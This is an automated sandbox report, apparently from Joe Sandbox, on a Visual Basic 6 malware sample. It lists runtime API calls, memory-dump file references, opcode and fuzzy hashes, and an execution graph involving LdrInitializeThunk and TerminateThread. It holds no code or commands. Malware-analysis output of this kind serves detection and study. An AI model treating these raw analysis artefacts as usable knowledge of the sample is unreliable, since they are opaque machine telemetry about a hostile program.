                                                                                                                          • Instruction Fuzzy Hash: ACD16E71A00208ABDB10EFA5DD48EDEBBB8FF58701F10412AF541F72A0D774A945CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000003,00000000), ref: 0041E512
                                                                                                                          • __vbaVarMove.MSVBVM60 ref: 0041E542
                                                                                                                          • __vbaVarCopy.MSVBVM60 ref: 0041E56E
                                                                                                                          • __vbaVarMove.MSVBVM60 ref: 0041E592
                                                                                                                          • __vbaVarCopy.MSVBVM60 ref: 0041E5C3
                                                                                                                          • #668.MSVBVM60(?,?), ref: 0041E5CD
                                                                                                                          • __vbaErase.MSVBVM60(00000000,?), ref: 0041E5D8
                                                                                                                          • __vbaVarTstNe.MSVBVM60(?,?), ref: 0041E5FD
                                                                                                                          • __vbaFreeVar.MSVBVM60 ref: 0041E609
                                                                                                                          • __vbaNew2.MSVBVM60(00403488,004204D8), ref: 0041E62A
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,0234EA7C,00403478,00000014), ref: 0041E655
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403498,00000068), ref: 0041E680
                                                                                                                          • __vbaFreeObj.MSVBVM60 ref: 0041E685
                                                                                                                          • __vbaNew2.MSVBVM60(00403488,004204D8), ref: 0041E69D
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,0234EA7C,00403478,00000014), ref: 0041E6C2
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403498,00000130), ref: 0041E6E8
                                                                                                                          • __vbaStrMove.MSVBVM60 ref: 0041E6F3
                                                                                                                          • __vbaFreeObj.MSVBVM60 ref: 0041E6FC
                                                                                                                          • __vbaNew2.MSVBVM60(00403488,004204D8), ref: 0041E714
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,0234EA7C,00403478,00000014), ref: 0041E739
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403498,00000130), ref: 0041E75F
                                                                                                                          • __vbaStrMove.MSVBVM60 ref: 0041E76A
                                                                                                                          • __vbaFreeObj.MSVBVM60 ref: 0041E773
                                                                                                                          • __vbaNew2.MSVBVM60(00403940,00420010), ref: 0041E78C
                                                                                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041E7A5
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004034E8,000000E8), ref: 0041E7CC
                                                                                                                          • #716.MSVBVM60(?,?,00000000), ref: 0041E7D7
                                                                                                                          • __vbaLateIdSt.MSVBVM60(?,00000000), ref: 0041E7FE
                                                                                                                          • __vbaFreeStr.MSVBVM60 ref: 0041E807
                                                                                                                          • __vbaFreeObj.MSVBVM60 ref: 0041E810
                                                                                                                          • __vbaFreeVar.MSVBVM60 ref: 0041E819
                                                                                                                          • __vbaFreeObj.MSVBVM60(0041E87A), ref: 0041E863
                                                                                                                          • __vbaFreeStr.MSVBVM60 ref: 0041E872
                                                                                                                          • __vbaFreeStr.MSVBVM60 ref: 0041E877
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47310862985.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.47310843756.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.47311008132.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.47311035451.0000000000422000.00000002.00020000.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __vba$Free$CheckHresult$MoveNew2$Copy$#668#716EraseLateRedim
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2446290755-0
                                                                                                                          • Opcode ID: 5e6c63fb53cbc4ba6585c2edbdc6012183d2a4a86fd8485301f0d51f7837dd05
                                                                                                                          • Instruction ID: 0370d614862ee785207eee18f9a01079d4b65040b2ffe8b3f788d5075672e42d
                                                                                                                          • Opcode Fuzzy Hash: 5e6c63fb53cbc4ba6585c2edbdc6012183d2a4a86fd8485301f0d51f7837dd05
                                                                                                                          • Instruction Fuzzy Hash: 5FB14C71900218AFCB14DFA8DD88EEDBBB8FB58715F10811AF505B72A0CB749945CF68
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • #632.MSVBVM60(?,?,00000000,?), ref: 0041B579
                                                                                                                          • __vbaStrVarVal.MSVBVM60(?,?), ref: 0041B587
                                                                                                                          • #516.MSVBVM60(00000000), ref: 0041B58E
                                                                                                                          • __vbaFreeStr.MSVBVM60 ref: 0041B5A4
                                                                                                                          • __vbaFreeVarList.MSVBVM60(00000002,00000002,?), ref: 0041B5B4
                                                                                                                          • #617.MSVBVM60(00000002,?,?), ref: 0041B5E6
                                                                                                                          • __vbaStrVarMove.MSVBVM60(00000002), ref: 0041B617
                                                                                                                          • __vbaStrMove.MSVBVM60 ref: 0041B622
                                                                                                                          • __vbaFreeVar.MSVBVM60 ref: 0041B62B
                                                                                                                          • __vbaI4Var.MSVBVM60(?), ref: 0041B63B
                                                                                                                          • __vbaStrToAnsi.MSVBVM60(?,?,?), ref: 0041B655
                                                                                                                          • __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,00000000), ref: 0041B66A
                                                                                                                          • __vbaI4Var.MSVBVM60(?,00000000,?,00000000,?,00000000), ref: 0041B671
                                                                                                                          • __vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,00000000), ref: 0041B67B
                                                                                                                          • __vbaStrToUnicode.MSVBVM60(?,?,?,00000000,?,00000000), ref: 0041B68C
                                                                                                                          • __vbaVarCopy.MSVBVM60(?,00000000,?,00000000), ref: 0041B6AB
                                                                                                                          • __vbaStrToUnicode.MSVBVM60(?,?,?,00000000,?,00000000), ref: 0041B6B9
                                                                                                                          • __vbaVarMove.MSVBVM60(?,00000000,?,00000000), ref: 0041B6D0
                                                                                                                          • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000,?,00000000), ref: 0041B6E0
                                                                                                                          • __vbaFreeVar.MSVBVM60(0041B733,?,?,00000000), ref: 0041B71D
                                                                                                                          • __vbaFreeVar.MSVBVM60(?,?,00000000), ref: 0041B722
                                                                                                                          • __vbaFreeVar.MSVBVM60(?,?,00000000), ref: 0041B727
                                                                                                                          • __vbaFreeStr.MSVBVM60(?,?,00000000), ref: 0041B72C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47310862985.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.47310843756.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.47311008132.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.47311035451.0000000000422000.00000002.00020000.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __vba$Free$Move$AnsiListUnicode$#516#617#632CopyErrorSystem
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1359953636-0
                                                                                                                          • Opcode ID: 9239c16675f6737271e3abc46f994c053cb59be26f4c00da76b1e0933eb010b2
                                                                                                                          • Instruction ID: f8748de5d8dfa4c9ea220443aec8d7b7af97ed888a63c04239baa84b9493184e
                                                                                                                          • Opcode Fuzzy Hash: 9239c16675f6737271e3abc46f994c053cb59be26f4c00da76b1e0933eb010b2
                                                                                                                          • Instruction Fuzzy Hash: 546108B1C002189BCB14DFA4DD84ADDFBB8FF98300F10815AE50AA7264DB746A89CF94
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __vbaSetSystemError.MSVBVM60(028E7E3B,00000000,00000000), ref: 0041F052
                                                                                                                          • __vbaI4Cy.MSVBVM60(00000000), ref: 0041F05A
                                                                                                                          • __vbaNew2.MSVBVM60(00403488,004204D8), ref: 0041F072
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,0234EA7C,00403478,00000014), ref: 0041F097
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403498,0000013C), ref: 0041F0E8
                                                                                                                          • __vbaFreeObj.MSVBVM60 ref: 0041F0F1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47310862985.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.47310843756.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.47311008132.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.47311035451.0000000000422000.00000002.00020000.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __vba$CheckHresult$ErrorFreeNew2System
                                                                                                                          • String ID: srlove
                                                                                                                          • API String ID: 3252491692-3382764130
                                                                                                                          • Opcode ID: 6ab643d18e96d9154a4f2352178d4efe6195a4dd7b2dc2826a0d1aa3c4502522
                                                                                                                          • Instruction ID: e39d5f927d9cd803004f82839173b74c41ae1db6a0eeb60acdb927c7fa679f2b
                                                                                                                          • Opcode Fuzzy Hash: 6ab643d18e96d9154a4f2352178d4efe6195a4dd7b2dc2826a0d1aa3c4502522
                                                                                                                          • Instruction Fuzzy Hash: 8A4171B1900318AFDB14EFA4DC85AAEBBB8FF49700F14403EE109B7251D7785945CB68
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __vbaNew2.MSVBVM60(00403940,00420010,?,?,?,?,?,?,?,?,?,004011E6), ref: 0041E3B3
                                                                                                                          • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,004011E6), ref: 0041E3D2
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004034E8,00000218,?,?,?,?,?,?,?,?,?,004011E6), ref: 0041E3F1
                                                                                                                          • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,004011E6), ref: 0041E400
                                                                                                                          • __vbaNew2.MSVBVM60(00403940,00420010,?,?,?,?,?,?,?,?,?,004011E6), ref: 0041E415
                                                                                                                          • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,004011E6), ref: 0041E42E
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004034E8,00000130,?,?,?,?,?,?,?,?,?,004011E6), ref: 0041E451
                                                                                                                          • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,004011E6), ref: 0041E460
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47310862985.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.47310843756.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.47311008132.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.47311035451.0000000000422000.00000002.00020000.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __vba$CheckFreeHresultNew2
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1645334062-0
                                                                                                                          • Opcode ID: b72ac1ca96013998f30f58f5ce955f9ebe32a14dc4cb9828129f9c6e41ae8a20
                                                                                                                          • Instruction ID: c44e23a08aee3f12305fa8a1105f26e33cb4a420ca09db4508c04ff095e2b64b
                                                                                                                          • Opcode Fuzzy Hash: b72ac1ca96013998f30f58f5ce955f9ebe32a14dc4cb9828129f9c6e41ae8a20
                                                                                                                          • Instruction Fuzzy Hash: B8316F74A00209ABCB10DFA5DD89F9ABBF8FF08700F50453AF945F7291C6789941CBA8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __vbaNew2.MSVBVM60(00403940,00420010), ref: 0041ED53
                                                                                                                          • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 0041ED6C
                                                                                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004034E8,00000220), ref: 0041EDAF
                                                                                                                          • __vbaFreeObj.MSVBVM60 ref: 0041EDB8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.47310862985.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.47310843756.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.47311008132.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.47311035451.0000000000422000.00000002.00020000.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __vba$CheckFreeHresultNew2
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1645334062-0
                                                                                                                          • Opcode ID: 45dea64dfa8ffb28d7682d16bfe2582be59a3224a2fa983418031c34f0819343
                                                                                                                          • Instruction ID: dfa46045771730cda4d46929efb9b60e5b86bbc2597fdc2c5a352414bebf3dbe
                                                                                                                          • Opcode Fuzzy Hash: 45dea64dfa8ffb28d7682d16bfe2582be59a3224a2fa983418031c34f0819343
                                                                                                                          • Instruction Fuzzy Hash: 82119074A00305AFD710DFA9EA49F9ABBF8FB08701F10852AF545F7290D7785841CBA9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:0%
                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                          Signature Coverage:0%
                                                                                                                          Total number of Nodes:8
                                                                                                                          Total number of Limit Nodes:1

                                                                                                                          Graph

                                                                                                                          execution_graph 68988 1e9029f0 LdrInitializeThunk 68989 5734be 68990 57345f TerminateThread 68989->68990 68991 573489 68989->68991 68990->68991 68994 1e902b20 68996 1e902b2a 68994->68996 68997 1e902b31 68996->68997 68998 1e902b3f LdrInitializeThunk 68996->68998

                                                                                                                          Executed Functions

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 4b6d9129e6853d94f6aeec4a048ec9db0758e1301701be173fdff541fbfa78f3
                                                                                                                          • Instruction ID: df2a6f06f47b5440d23ebb4a8352bbee8500a6dd9701dcc9f1ec442442e79f4d
                                                                                                                          • Opcode Fuzzy Hash: 4b6d9129e6853d94f6aeec4a048ec9db0758e1301701be173fdff541fbfa78f3
                                                                                                                          • Instruction Fuzzy Hash: FB90023120150802D5106259491474F505547D0712F91C559A1254D15DC63588527971
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: ce25a412911b0fb7420211eb167891969cb220d0501d998db5207e5cc99bc0a9
                                                                                                                          • Instruction ID: 01740e23ab4c712f6a26524426d1e62653b6c85f8ef57554670ec659d5d08cf7
                                                                                                                          • Opcode Fuzzy Hash: ce25a412911b0fb7420211eb167891969cb220d0501d998db5207e5cc99bc0a9
                                                                                                                          • Instruction Fuzzy Hash: 699002216011044245507269894494A90556BE1621791C669A0A88D10DC56988667A65
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: e40983c2423c71c9180b8a0764bf2f306d9ba3478c95af06f18227a92dc9397c
                                                                                                                          • Instruction ID: 7ff54f2b0d25bd59729645c060735ee074f0b642b94aa11e523632924468a326
                                                                                                                          • Opcode Fuzzy Hash: e40983c2423c71c9180b8a0764bf2f306d9ba3478c95af06f18227a92dc9397c
                                                                                                                          • Instruction Fuzzy Hash: B090026134110842D51062594514B4A505587E1711F91C55DE1154D14DC629CC537526
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 7c8f1bcf8a010f74ef3e2f58c8caa1c67c49e5bb21f488212d98a3216891a331
                                                                                                                          • Instruction ID: 5a36a4b98acb87e65ff3adc788b4d534c301d3c8ad6d56604e06802720e503f0
                                                                                                                          • Opcode Fuzzy Hash: 7c8f1bcf8a010f74ef3e2f58c8caa1c67c49e5bb21f488212d98a3216891a331
                                                                                                                          • Instruction Fuzzy Hash: 1490022121190442D61066694D14B4B505547D0713F91C65DA0244D14CC92588627921
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 649dcaf44a4e9278e9a92cf1da28015b6955ed0e2c936c606932bac073034a59
                                                                                                                          • Instruction ID: 2b788238a01b64209e2619f729f66881218761622458159ec57413de1edee151
                                                                                                                          • Opcode Fuzzy Hash: 649dcaf44a4e9278e9a92cf1da28015b6955ed0e2c936c606932bac073034a59
                                                                                                                          • Instruction Fuzzy Hash: AE900221242145525955B259450454B905657E06517D1C55AA1504D10CC5369857FA21
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: a940577e60093ad22253a6099b4bbf5f46f301596ee0199ea363d9b4b45d4948
                                                                                                                          • Instruction ID: e4b9edc0812e3943fc27f21b416e28e2a6e093e536a49b415bbb339391d2f179
                                                                                                                          • Opcode Fuzzy Hash: a940577e60093ad22253a6099b4bbf5f46f301596ee0199ea363d9b4b45d4948
                                                                                                                          • Instruction Fuzzy Hash: 5490022921310402D5907259550864E505547D1612FD1D95DA0105D18CC925886A7721
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: b47efeae2d9beb3a06882591b79d4fae8356faf9123fb96d9fa7584dbe87a9b4
                                                                                                                          • Instruction ID: eb2566ca242d86650a2527bc8a7714f82fa5e0e42afbb0acf4452adae397d1d3
                                                                                                                          • Opcode Fuzzy Hash: b47efeae2d9beb3a06882591b79d4fae8356faf9123fb96d9fa7584dbe87a9b4
                                                                                                                          • Instruction Fuzzy Hash: 4890022130110403D5507259551864A905597E1711F91D559E0504D14CD92588577622
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 1b8fc45c0f62beb359c25b00d2574ba9a2adb340cbf53b3890ea06e6f54c15eb
                                                                                                                          • Instruction ID: be0e0ee3945f6ffad85b8f006e4461f4c66cc19196e6efc37680bedb4dbd5511
                                                                                                                          • Opcode Fuzzy Hash: 1b8fc45c0f62beb359c25b00d2574ba9a2adb340cbf53b3890ea06e6f54c15eb
                                                                                                                          • Instruction Fuzzy Hash: 4B90022160110902D5117259450465A505A47D0651FD1C56AA1114D15ECA358993B531
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 9c92fc59df171b8daaf7d0c75cf0879bbf17c7e8b8cf08ad367588f83891a205
                                                                                                                          • Instruction ID: 82071d9ecb224294e14db9cfc2bc137e24ecea03ebe5fa02daf4b2793c897821
                                                                                                                          • Opcode Fuzzy Hash: 9c92fc59df171b8daaf7d0c75cf0879bbf17c7e8b8cf08ad367588f83891a205
                                                                                                                          • Instruction Fuzzy Hash: D390027120110802D5507259450478A505547D0711F91C559A5154D14EC6698DD67A65
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 3f9a0e864c01a843e734c02676f6a7942959ca3ca57211b2c8af4eca4a408756
                                                                                                                          • Instruction ID: f8cb7591a5ab58a61b94a9f72a1f7849d78ccf031ad41445391f6b2e006cdae4
                                                                                                                          • Opcode Fuzzy Hash: 3f9a0e864c01a843e734c02676f6a7942959ca3ca57211b2c8af4eca4a408756
                                                                                                                          • Instruction Fuzzy Hash: 8B90023120110813D5216259460474B505947D0651FD1C95AA0514D18DD6668953B521
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 332 1e902b90-1e902b9c LdrInitializeThunk
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: cbc87587ef6fdb9c1994c872ea9dbba703dcbf40387c7df1962839f1596f5b85
                                                                                                                          • Instruction ID: 9ff7f6999d49e28d8386e4f957bd37ddd0ff3f8d9e085fdb0753750b1ed47321
                                                                                                                          • Opcode Fuzzy Hash: cbc87587ef6fdb9c1994c872ea9dbba703dcbf40387c7df1962839f1596f5b85
                                                                                                                          • Instruction Fuzzy Hash: 2A90023120118C02D5206259850478E505547D0711F95C959A4514E18DC6A588927521
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 9ac16548e836f13d5889208c10b8bbddc87bfcc6d13113ef88f4d36e2739d4fa
                                                                                                                          • Instruction ID: 4e10d46e85ee2b3fa0ef2ced33cdb8ffa5b7ece68ff1210d71e304f4987c7162
                                                                                                                          • Opcode Fuzzy Hash: 9ac16548e836f13d5889208c10b8bbddc87bfcc6d13113ef88f4d36e2739d4fa
                                                                                                                          • Instruction Fuzzy Hash: B390023120110802D5106699550868A505547E0711F91D559A5114D15EC67588927531
